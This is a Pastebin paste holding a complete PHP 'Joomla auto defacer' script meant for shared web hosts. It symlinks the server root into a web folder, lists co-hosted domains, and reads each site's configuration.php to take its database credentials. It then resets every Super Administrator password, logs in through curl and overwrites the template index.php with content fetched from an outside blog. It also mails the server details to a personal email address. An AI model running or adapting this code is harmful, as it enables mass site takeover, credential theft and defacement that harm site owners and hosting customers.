Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <?
- //joomla auto defacer
- //coded by ECF
- ini_set("display_errors", "0");
- set_time_limit(0);
- @session_start();
- echo "<p> <center> <font color=red font face='tahoma' size='6pt'>AUTOMATIC JOOMLA DEFACER </center></font> </p>";
- echo "<p> <center> <font color=green font face='tahoma' size='4pt'>CODED BY : ECF</center></font> </p>";
- echo "<p> <center> <font color=green font face='tahoma' size='4pt'>ECF</center></font> </p>";
- echo "<p> <center> <font color=green font face='tahoma' size='4pt'>http://blog.ecf.me</center></font> </p>";
- //mail feature
- $body=("server ip:".$_SERVER['SERVER_ADDR']." "."Site Name:".$_SERVER['SERVER_NAME']." "."Directory".dirname(__FILE__));
- mail('nadimzobaer@gmail.com',$_SERVER['SERVER_ADDR'],$body);
- $base_url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']);
- //create symlink of / to /ecf/root/
- @mkdir('ecf',0777);
- $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
- $fp = @fopen ('ecf/.htaccess','w');
- fwrite($fp, $wr);
- @symlink('/','ecf/root');
- //collecting site names
- $text=file_get_contents($base_url.'/ecf/root/var/named/');
- $ar = explode('<li><a href="', $text);
- for($vi=2;$vi < count($ar);$vi++)
- {
- $var1 = strtok($ar[$vi], " ");
- $var1 = substr($var1,0,-2);
- $old=('.db');
- $new=('');
- $sites = str_replace($old , $new , $var1);
- $filename = 'sites.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $sites."\n");
- fclose($fp);
- }
- //collecting domainuser names for sites
- $domainusers=file('sites.txt');
- foreach ($domainusers as $domainuser) {
- $textexec=("ls -la /etc/valiases/".$domainuser);
- $exec=exec($textexec);
- $filename = 'lsla.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $exec."\n");
- fclose($fp);
- }
- //creating final domain and domain user list
- $lsla=file('lsla.txt');
- foreach ($lsla as $finaldom) {
- $user=entre2v2($finaldom,"-rw-r----- 1 "," mail");
- $site=substr(strstr($finaldom, '/etc/valiases'),14);
- $filename = 'bhung.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $user.":". $site." ");
- fclose($fp);
- }
- $f=file_get_contents('bhung.txt');
- $finals=explode(" ",$f);
- foreach ($finals as $final){
- $strlen=('6');
- $dr=strlen ($final);
- if ($dr < $strlen) {
- $filename = 'faltu.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final);
- fclose($fp);
- }
- else {
- $filename = 'gold.txt';
- $fp = fopen($filename, "a");
- $write = fputs($fp, $final."\n");
- fclose($fp);
- }
- }
- //delete ajaira text files
- unlink ('bhung.txt');
- unlink ('faltu.txt');
- unlink ('lsla.txt');
- unlink ('sites.txt');
- $h=file_get_contents('http://blog.ecf.me');
- $url=($base_url);
- $a=file($base_url.'/gold.txt');
- echo ("<center><table border=1 cellspacing=1 cellpading=1>
- <tr> <th width=200>Domain User</th> <th width=250>Website Name</td><th width=100>CMS</td><th width=200>Status</td></tr>");
- foreach ($a as $final) {
- list($user, $site_url) = explode(":", $final);
- $site_urlto = substr($site_url, 0, -1);
- $url2=($url."/ecf/root/home/".$user."/public_html/configuration.php");
- $configs=file_get_contents($url2);
- $old=('$');
- $new=('ecf');
- $configfile = str_replace($old , $new , $configs);
- $username=entre2v2($configfile, "ecfuser = '","';");
- $password=entre2v2($configfile, "ecfpassword = '","';");
- $dbname=entre2v2($configfile, "ecfdb = '","';");
- $dbprefix=entre2v2($configfile, "ecfdbprefix = '","';");
- $strlendbprefix= strlen ($dbprefix);
- if ($strlendbprefix > 2) {
- $link=mysql_connect("localhost",$username,$password) ;
- mysql_select_db($dbname,$link) ;
- $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J' where usertype='Super Administrator'");
- //checking pass change
- $reqpass=('44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J');
- $checkpass= mysql_query("SELECT password FROM ".$dbprefix."users where username='admin'");
- $showpass=mysql_fetch_array ($checkpass);
- if ($showpass[0]== $reqpass) {
- $filename = 'passchanged.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $site_url."\n");
- fclose($fp);
- //upto this alright
- $req =mysql_query("SELECT * from `".$dbprefix."extensions` ");
- $co=randomt();
- if ( $req )
- {
- $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'");
- $data = mysql_fetch_array($req);
- $template_id=$data["extension_id"];
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $return=entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
- ///////////////////////////
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&return=".$return."&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- }
- else {
- }
- ///////////////////////////
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
- if($hidden2) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,'<dd class="message message">');
- if($pos === false) {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
- }
- else {
- $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
- $filename = 'deftemp.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $deftempurl."\n");
- fclose($fp);
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
- }
- }
- else
- {
- $req =mysql_query("SELECT * from `".$dbprefix."templates_menu` WHERE client_id='0'");
- $data = mysql_fetch_array($req);
- $template_name=$data["template"];
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
- $urlto=$site_urlto."/administrator/index.php";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=1&option=com_login&task=login&".$hidden."=1");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,"com_config");
- if($pos === false) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
- if($hidden2) {
- }
- else {
- }
- $urlto=$site_urlto."/administrator/index.php?option=com_templates&layout=edit";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $urlto);
- curl_setopt($ch, CURLOPT_POST, 1);
- curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$h."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
- curl_setopt($ch, CURLOPT_HEADER, 0);
- curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
- curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
- curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
- $buffer = curl_exec($ch);
- $pos = strpos($buffer,'<dd class="message message fade">');
- if($pos === false) {
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=red> Failed </font></td></tr></table></center>";
- }
- else {
- $deftempurl=("http://".$site_urlto."/templates/".$template_name."/index.php");
- $filename = 'deftemp.txt';
- $fp = fopen($filename, "a+");
- $write = fputs($fp, $deftempurl."\n");
- fclose($fp);
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <tr><td width=200><font color=green> $user</font></td><td width=250><font color=green> $site_url<font></td><td width=100><font color=green> Joomla</font></td><td width=200><font color=green> Defaced </font></td></tr></table></center>";
- }
- }
- //upto this alright
- }
- else {
- }
- }
- else {
- }
- }
- $cntpasschanged=file('passchanged.txt');
- $countpasschanged= count ($cntpasschanged);
- echo("<br>");
- $defacedurl=('<a href="deftemp.txt" target="_blank">View List of Defaced Site</a><br />');
- $passchangedurl=('<a href="passchanged.txt" target="_blank">View List of Password Changed site</a><br />');
- echo "<center><table border=1 cellspacing=1 cellpading=1>
- <td width=300><font color=green> $defacedurl</font></td><td width=300><font color=green> $passchangedurl </font></td></tr></table></center>";
- //declaring function entre2v2
- function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
- $ar0=explode($marqueurDebutLien, $text);
- $ar1=explode($marqueurFinLien, $ar0[$i]);
- return trim($ar1[0]);
- }
- function randomt() {
- $chars = "abcdefghijkmnopqrstuvwxyz023456789";
- srand((double)microtime()*1000000);
- $i = 0;
- $pass = '' ;
- while ($i <= 7) {
- $num = rand() % 33;
- $tmp = substr($chars, $num, 1);
- $pass = $pass . $tmp;
- $i++;
- }
- return $pass;
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement